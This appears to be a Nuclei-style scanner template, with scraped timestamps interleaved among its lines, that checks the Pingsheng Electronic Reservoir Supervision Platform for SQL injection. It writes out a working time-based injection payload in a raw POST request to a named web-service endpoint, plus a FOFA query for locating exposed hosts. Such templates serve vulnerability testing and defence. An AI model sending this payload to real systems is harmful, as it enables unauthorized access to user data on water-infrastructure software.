2024-07-08 23:11:54 +00:00
id : pingsheng-electronic-sqli
info :
name : Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
author : securityforeveryone
2024-07-09 10:24:07 +00:00
severity : high
2024-07-08 23:11:54 +00:00
description : |
2024-07-09 10:19:53 +00:00
There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
2024-07-08 23:11:54 +00:00
reference :
- https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
2024-07-09 10:19:53 +00:00
- https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
2024-07-08 23:11:54 +00:00
metadata :
2024-07-09 10:19:53 +00:00
verified : "true"
2024-07-08 23:11:54 +00:00
max-request : 1
fofa-query : "js/PSExtend.js"
tags : sqli,pingsheng
http :
- raw :
- |
@timeout 20s
POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
matchers :
- type : dsl
dsl :
- 'duration>=6'
2024-07-09 10:19:53 +00:00
- 'contains_all(body,"Result","false","Message")'
- 'contains(content_type,"text/xml")'
2024-07-08 23:11:54 +00:00
- 'status_code == 200'
condition : and
2024-07-10 06:10:27 +00:00
# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950